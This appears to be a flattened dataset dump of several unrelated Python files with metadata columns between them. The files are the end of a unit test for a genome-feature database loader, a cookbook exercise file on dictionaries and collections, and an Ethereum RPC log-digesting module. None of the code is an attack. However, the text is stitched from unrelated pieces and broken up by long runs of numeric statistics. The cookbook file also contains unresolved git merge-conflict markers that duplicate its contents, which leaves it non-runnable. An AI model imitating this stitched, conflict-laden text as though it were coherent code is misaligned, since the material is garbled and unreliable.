.filter_by(uniquename='an_utr_with_two_parents') \
.all()
assert len(confused_child_f) == 1, "1 utr with 2 parents"
confused_rels = confused_child_f[0].subject_in_relationships
assert len(confused_rels) == 2, "1 utr with 2 parents"
for r in confused_rels:
assert (r.object.uniquename == 'PAC:18136239') or (r.object.uniquename == 'PAC:18136238'), "1 utr with 2 parents"
# Check Derives_from
derivesfrom = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename='some_special_cds') \
.all()
assert len(derivesfrom) == 1, "derives_from"
derivesfrom_rels = derivesfrom[0].subject_in_relationships
assert len(derivesfrom_rels) == 2, "derives_from"
for r in derivesfrom_rels:
assert (r.object.uniquename == 'PAC:18136217') or (r.object.uniquename == 'PAC:18136225'), "derives_from"
terms = {cvt.cvterm.name: cvt.cvterm.dbxref.db_id for cvt in derivesfrom[0].feature_cvterm_collection}
assert len(terms) == 2, "gff>ontology_term loaded correctly"
assert '000001' in terms, "gff>ontology_term loaded correctly"
assert '00002' in terms, "gff>ontology_term loaded correctly"
assert terms['000001'] == dbs['GO'], "gff>ontology_term loaded correctly"
assert terms['00002'] == dbs['GO'], "gff>ontology_term loaded correctly"
# Target location
assert len(derivesfrom[0].featureloc_collection) == 2, "gff>target loc ok"
if derivesfrom[0].featureloc_collection[0].fmin == 120:
checkedloc = 0
else:
checkedloc = 1
assert derivesfrom[0].featureloc_collection[checkedloc].fmin == 120, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].fmax == 320, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].strand == -1, "gff>target loc ok"
assert derivesfrom[0].featureloc_collection[checkedloc].rank == 1, "gff>gene located correctly"
def setUp(self):
self.ci = ci
self.ci.organism.delete_organisms()
self.ci.analysis.delete_analyses()
self.ci.feature.delete_features()
# Make sure dbxref are deleted too
self._del_dbxref()
self.ci.session.commit()
def tearDown(self):
self.ci.organism.delete_organisms()
self.ci.analysis.delete_analyses()
self.ci.feature.delete_features()
# Make sure dbxref are deleted too
self._del_dbxref()
self.ci.session.commit()
| 57.888278
| 224
| 0.686019
| 12,675
| 94,821
| 4.9357
| 0.027219
| 0.119405
| 0.107081
| 0.066113
| 0.968063
| 0.964067
| 0.957896
| 0.955163
| 0.94976
| 0.934703
| 0
| 0.03669
| 0.200915
| 94,821
| 1,637
| 225
| 57.923641
| 0.788967
| 0.026123
| 0
| 0.882158
| 0
| 0.046473
| 0.276672
| 0.029892
| 0
| 0
| 0
| 0
| 0.564315
| 1
| 0.017427
| false
| 0
| 0.00166
| 0
| 0.019917
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
dc0dbb9039c841f1dfc7ec952a49857bc2478422
| 11,301
|
py
|
Python
|
cookbook/dt-and-al.py
|
ianzhengnan/learnpy
|
ed1736ac976d56253183399466a167fb9319f869
|
[
"Apache-2.0"
] | 1
|
2017-06-12T03:12:29.000Z
|
2017-06-12T03:12:29.000Z
|
cookbook/dt-and-al.py
|
ianzhengnan/learnpy
|
ed1736ac976d56253183399466a167fb9319f869
|
[
"Apache-2.0"
] | null | null | null |
cookbook/dt-and-al.py
|
ianzhengnan/learnpy
|
ed1736ac976d56253183399466a167fb9319f869
|
[
"Apache-2.0"
] | null | null | null |
<<<<<<< HEAD
# records = [
# ('foo', 1,2),
# ('bar', 'hello'),
# ('foo', 3,4)
# ]
# def do_foo(x, y):
# print('foo', x, y)
# def do_bar(s):
# print('bar', s)
# for tag, *args in records:
# if tag == 'foo':
# do_foo(*args)
# elif tag == 'bar':
# do_bar(*args)
# #---------------------------------------------------------------------------------------------
# from collections import deque
# def search(lines, pattern, history=5):
# previous_lines = deque(maxlen=history)
# for line in lines:
# if pattern in line:
# # return main function if pattern is matched
# yield line, previous_lines
# previous_lines.append(line)
# if __name__ == '__main__':
# with open('test.txt') as f:
# for line, prevlines in search(f, 'python', 5):
# # print previous lines
# for pline in prevlines:
# print(pline, end='')
# # print current line
# print(line, end='')
# # print 20 '-' for separate
# print('-'*20)
#---------------------------------------------------------------------------------------------
# from collections import defaultdict
# d = defaultdict(list)
# d['a'].append(1)
# d['a'].append(2)
# d['b'].append(3)
# print(list(d.items()))
#---------------------------------------------------------------------------------------------
# from collections import OrderedDict
# d1 = dict()
# d1['foo'] = 1
# d1['bar'] = 2
# d1['spam'] = 3
# d1['grok'] = 4
# print(d1)
# d2 = OrderedDict()
# d2['foo'] = 1
# d2['bar'] = 2
# d2['spam'] = 3
# d2['grok'] = 4
# print(d2)
#---------------------------------------------------------------------------------------------
# prices = {
# 'ACME': 45.23,
# 'AAPL': 612.78,
# 'IBM' : 205.55,
# 'HPQ' : 37.2,
# 'FB' : 10.75
# }
# min_price = min(zip(prices.values(), prices.keys()))
# print(min_price)
# max_price = max(zip(prices.values(), prices.keys()))
# print(max_price)
# prices_sorted = sorted(zip(prices.values(), prices.keys()))
# print(prices_sorted)
#---------------------------------------------------------------------------------------------
# a = {
# 'x': 1,
# 'y': 2,
# 'z': 3
# }
# b = {
# 'w': 10,
# 'x': 3,
# 'y': 2
# }
# print(a.keys() & b.keys())
# print(a.keys() - b.keys())
# print(a.items() & b.items())
#---------------------------------------------------------------------------------------------
# items = [0,1,2,3,5,7,8,9]
# a = slice(2,4)
# print(items[a]) # [2,3]
# items[a] = [10, 11]
# print(items) #[0,1,10,11,5,7,8,9]
# del items[a]
# print(items) #[0,1,5,7,8,9]
#---------------------------------------------------------------------------------------------
# words = [
# 'look', 'into', 'my', 'eyes', 'look', 'into', 'my', 'eyes',
# 'the', 'eyes', 'the', 'eyes', 'the', 'eyes', 'not', 'around', 'the',
# 'eyes', "don't", 'look', 'around', 'the', 'eyes', 'look', 'into',
# 'my', 'eyes', "you're", 'under'
# ]
# from collections import Counter
# word_counts = Counter(words)
# top_three = word_counts.most_common(3)
# print(top_three)
#---------------------------------------------------------------------------------------------
# from operator import itemgetter
# rows = [
# {'fname': 'Brian', 'lname': 'Jones', 'uid': 1003},
# {'fname': 'David', 'lname': 'Beazley', 'uid': 1002},
# {'fname': 'John', 'lname': 'Cleese', 'uid': 1001},
# {'fname': 'Big', 'lname': 'Jones', 'uid': 1004}
# ]
# row_by_fname = sorted(rows, key=itemgetter('fname'))
# print(row_by_fname)
# row_by_lname = sorted(rows, key=itemgetter('lname'))
# print(row_by_lname)
# row_by_lfname = sorted(rows, key=itemgetter('fname', 'lname'))
# print(row_by_lfname)
# print(min(rows, key=itemgetter('uid')))
# print(max(rows, key=itemgetter('uid')))
#---------------------------------------------------------------------------------------------
# class User:
# def __init__(self, user_id):
# self.user_id = user_id
# def __repr__(self):
# return 'User( {})'.format(self.user_id)
# users = [User(23), User(1), User(99)]
# print(users)
# print(users[0])
#---------------------------------------------------------------------------------------------
# from operator import itemgetter
# from itertools import groupby
# rows = [
# {'address': '5412 N CLARK', 'date': '07/01/2012'},
# {'address': '5148 N CLARK', 'date': '07/04/2012'},
# {'address': '5800 E 58TH', 'date': '07/02/2012'},
# {'address': '2122 N CLARK', 'date': '07/03/2012'},
# {'address': '5645 N RAVENSWOOD', 'date': '07/02/2012'},
# {'address': '1060 W ADDISON', 'date': '07/02/2012'},
# {'address': '4801 N BROADWAY', 'date': '07/01/2012'},
# {'address': '1039 W GRANVILLE', 'date': '07/04/2012'},
# ]
# rows.sort(key=itemgetter('date'))
# for date, items in groupby(rows, key=itemgetter('date')):
# print(date)
# for i in items:
# print(' ', i)
# print(groupby(rows, key=itemgetter('date')))
#---------------------------------------------------------------------------------------------
prices = {
'ACME': 45.23,
'AAPL': 612.78,
'IBM': 205.55,
'HPQ': 37.20,
'FB': 10.75
}
new_prices = {key:value for key, value in prices.items() if value > 200}
tech_stock = {'AAPL', 'FB', 'IBM', 'MSFT'}
new_prices2 = {key:value for key, value in prices.items() if key in tech_stock}
print(new_prices2)
=======
# records = [
# ('foo', 1,2),
# ('bar', 'hello'),
# ('foo', 3,4)
# ]
# def do_foo(x, y):
# print('foo', x, y)
# def do_bar(s):
# print('bar', s)
# for tag, *args in records:
# if tag == 'foo':
# do_foo(*args)
# elif tag == 'bar':
# do_bar(*args)
# #---------------------------------------------------------------------------------------------
# from collections import deque
# def search(lines, pattern, history=5):
# previous_lines = deque(maxlen=history)
# for line in lines:
# if pattern in line:
# # return main function if pattern is matched
# yield line, previous_lines
# previous_lines.append(line)
# if __name__ == '__main__':
# with open('test.txt') as f:
# for line, prevlines in search(f, 'python', 5):
# # print previous lines
# for pline in prevlines:
# print(pline, end='')
# # print current line
# print(line, end='')
# # print 20 '-' for separate
# print('-'*20)
#---------------------------------------------------------------------------------------------
# from collections import defaultdict
# d = defaultdict(list)
# d['a'].append(1)
# d['a'].append(2)
# d['b'].append(3)
# print(list(d.items()))
#---------------------------------------------------------------------------------------------
# from collections import OrderedDict
# d1 = dict()
# d1['foo'] = 1
# d1['bar'] = 2
# d1['spam'] = 3
# d1['grok'] = 4
# print(d1)
# d2 = OrderedDict()
# d2['foo'] = 1
# d2['bar'] = 2
# d2['spam'] = 3
# d2['grok'] = 4
# print(d2)
#---------------------------------------------------------------------------------------------
# prices = {
# 'ACME': 45.23,
# 'AAPL': 612.78,
# 'IBM' : 205.55,
# 'HPQ' : 37.2,
# 'FB' : 10.75
# }
# min_price = min(zip(prices.values(), prices.keys()))
# print(min_price)
# max_price = max(zip(prices.values(), prices.keys()))
# print(max_price)
# prices_sorted = sorted(zip(prices.values(), prices.keys()))
# print(prices_sorted)
#---------------------------------------------------------------------------------------------
# a = {
# 'x': 1,
# 'y': 2,
# 'z': 3
# }
# b = {
# 'w': 10,
# 'x': 3,
# 'y': 2
# }
# print(a.keys() & b.keys())
# print(a.keys() - b.keys())
# print(a.items() & b.items())
#---------------------------------------------------------------------------------------------
# items = [0,1,2,3,5,7,8,9]
# a = slice(2,4)
# print(items[a]) # [2,3]
# items[a] = [10, 11]
# print(items) #[0,1,10,11,5,7,8,9]
# del items[a]
# print(items) #[0,1,5,7,8,9]
#---------------------------------------------------------------------------------------------
# words = [
# 'look', 'into', 'my', 'eyes', 'look', 'into', 'my', 'eyes',
# 'the', 'eyes', 'the', 'eyes', 'the', 'eyes', 'not', 'around', 'the',
# 'eyes', "don't", 'look', 'around', 'the', 'eyes', 'look', 'into',
# 'my', 'eyes', "you're", 'under'
# ]
# from collections import Counter
# word_counts = Counter(words)
# top_three = word_counts.most_common(3)
# print(top_three)
#---------------------------------------------------------------------------------------------
# from operator import itemgetter
# rows = [
# {'fname': 'Brian', 'lname': 'Jones', 'uid': 1003},
# {'fname': 'David', 'lname': 'Beazley', 'uid': 1002},
# {'fname': 'John', 'lname': 'Cleese', 'uid': 1001},
# {'fname': 'Big', 'lname': 'Jones', 'uid': 1004}
# ]
# row_by_fname = sorted(rows, key=itemgetter('fname'))
# print(row_by_fname)
# row_by_lname = sorted(rows, key=itemgetter('lname'))
# print(row_by_lname)
# row_by_lfname = sorted(rows, key=itemgetter('fname', 'lname'))
# print(row_by_lfname)
# print(min(rows, key=itemgetter('uid')))
# print(max(rows, key=itemgetter('uid')))
#---------------------------------------------------------------------------------------------
# class User:
# def __init__(self, user_id):
# self.user_id = user_id
# def __repr__(self):
# return 'User( {})'.format(self.user_id)
# users = [User(23), User(1), User(99)]
# print(users)
# print(users[0])
#---------------------------------------------------------------------------------------------
# from operator import itemgetter
# from itertools import groupby
# rows = [
# {'address': '5412 N CLARK', 'date': '07/01/2012'},
# {'address': '5148 N CLARK', 'date': '07/04/2012'},
# {'address': '5800 E 58TH', 'date': '07/02/2012'},
# {'address': '2122 N CLARK', 'date': '07/03/2012'},
# {'address': '5645 N RAVENSWOOD', 'date': '07/02/2012'},
# {'address': '1060 W ADDISON', 'date': '07/02/2012'},
# {'address': '4801 N BROADWAY', 'date': '07/01/2012'},
# {'address': '1039 W GRANVILLE', 'date': '07/04/2012'},
# ]
# rows.sort(key=itemgetter('date'))
# for date, items in groupby(rows, key=itemgetter('date')):
# print(date)
# for i in items:
# print(' ', i)
# print(groupby(rows, key=itemgetter('date')))
#---------------------------------------------------------------------------------------------
prices = {
'ACME': 45.23,
'AAPL': 612.78,
'IBM': 205.55,
'HPQ': 37.20,
'FB': 10.75
}
new_prices = {key:value for key, value in prices.items() if value > 200}
tech_stock = {'AAPL', 'FB', 'IBM', 'MSFT'}
new_prices2 = {key:value for key, value in prices.items() if key in tech_stock}
print(new_prices2)
>>>>>>> refs/remotes/origin/master
| 24.355603
| 97
| 0.427307
| 1,233
| 11,301
| 3.827251
| 0.150852
| 0.044077
| 0.050434
| 0.026701
| 0.994278
| 0.994278
| 0.994278
| 0.994278
| 0.994278
| 0.994278
| 0
| 0.053921
| 0.209008
| 11,301
| 463
| 98
| 24.408207
| 0.47399
| 0.854526
| 0
| 0.8
| 0
| 0
| 0.052394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.08
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
dc1352a0c2e4a18514a3fcd504082382c453ee8d
| 3,786
|
py
|
Python
|
src/ctc/rpc/rpc_digestors/rpc_log_digestors.py
|
fei-protocol/checkthechain
|
ec838f3d0d44af228f45394d9ba8d8eb7f677520
|
[
"MIT"
] | 94
|
2022-02-15T19:34:49.000Z
|
2022-03-26T19:26:22.000Z
|
src/ctc/rpc/rpc_digestors/rpc_log_digestors.py
|
fei-protocol/checkthechain
|
ec838f3d0d44af228f45394d9ba8d8eb7f677520
|
[
"MIT"
] | 7
|
2022-03-03T02:58:47.000Z
|
2022-03-11T18:41:05.000Z
|
src/ctc/rpc/rpc_digestors/rpc_log_digestors.py
|
fei-protocol/checkthechain
|
ec838f3d0d44af228f45394d9ba8d8eb7f677520
|
[
"MIT"
] | 7
|
2022-02-15T17:53:07.000Z
|
2022-03-17T19:14:17.000Z
|
from __future__ import annotations
from ctc import spec
from ctc import binary
from .. import rpc_format
from .. import rpc_spec
def digest_eth_new_filter(
response: spec.RpcSingularResponse, decode_response: bool = False
) -> spec.RpcSingularResponse:
if decode_response:
response = binary.convert(response, 'integer')
return response
def digest_eth_new_block_filter(
response: spec.RpcSingularResponse, decode_response: bool = False
) -> spec.RpcSingularResponse:
if decode_response:
response = binary.convert(response, 'integer')
return response
def digest_eth_new_pending_transaction_filter(
response: spec.RpcSingularResponse, decode_response: bool = False
) -> spec.RpcSingularResponse:
if decode_response:
response = binary.convert(response, 'integer')
return response
def digest_eth_uninstall_filter(
response: spec.RpcSingularResponse, decode_response: bool = False
) -> spec.RpcSingularResponse:
if decode_response:
response = binary.convert(response, 'integer')
return response
def digest_eth_get_filter_changes(
response: spec.RpcSingularResponse,
decode_response: bool = True,
snake_case_response: bool = True,
include_removed: bool = False,
) -> spec.RpcSingularResponse:
if (
not include_removed
and len(response) > 0
and isinstance(response[0], dict)
):
response = [
subresponse
for subresponse in response
if not subresponse['removed']
]
if decode_response and len(response) > 0 and isinstance(response[0], dict):
response = [
rpc_format.decode_response(subresponse, rpc_spec.rpc_log_quantities)
for subresponse in response
]
if (
snake_case_response
and len(response) > 0
and isinstance(response[0], dict)
):
response = [
rpc_format.keys_to_snake_case(subresponse)
for subresponse in response
]
return response
def digest_eth_get_filter_logs(
response: spec.RpcSingularResponse,
decode_response: bool = True,
snake_case_response: bool = True,
include_removed: bool = False,
) -> spec.RpcSingularResponse:
if not include_removed:
response = [
subresponse
for subresponse in response
if not subresponse['removed']
]
if decode_response and len(response) > 0 and isinstance(response[0], dict):
response = [
rpc_format.decode_response(subresponse, rpc_spec.rpc_log_quantities)
for subresponse in response
]
if (
snake_case_response
and len(response) > 0
and isinstance(response[0], dict)
):
response = [
rpc_format.keys_to_snake_case(subresponse)
for subresponse in response
]
return response
def digest_eth_get_logs(
response: spec.RpcSingularResponse,
decode_response: bool = True,
snake_case_response: bool = True,
include_removed: bool = False,
) -> spec.RpcSingularResponse:
if not include_removed:
response = [
subresponse
for subresponse in response
if not subresponse['removed']
]
if decode_response and len(response) > 0 and isinstance(response[0], dict):
response = [
rpc_format.decode_response(subresponse, rpc_spec.rpc_log_quantities)
for subresponse in response
]
if (
snake_case_response
and len(response) > 0
and isinstance(response[0], dict)
):
response = [
rpc_format.keys_to_snake_case(subresponse)
for subresponse in response
]
return response
| 26.851064
| 80
| 0.653988
| 403
| 3,786
| 5.918114
| 0.119107
| 0.09979
| 0.060377
| 0.090566
| 0.935849
| 0.935849
| 0.935849
| 0.92956
| 0.92956
| 0.92956
| 0
| 0.005098
| 0.274696
| 3,786
| 140
| 81
| 27.042857
| 0.863438
| 0
| 0
| 0.807018
| 0
| 0
| 0.012946
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061404
| false
| 0
| 0.04386
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.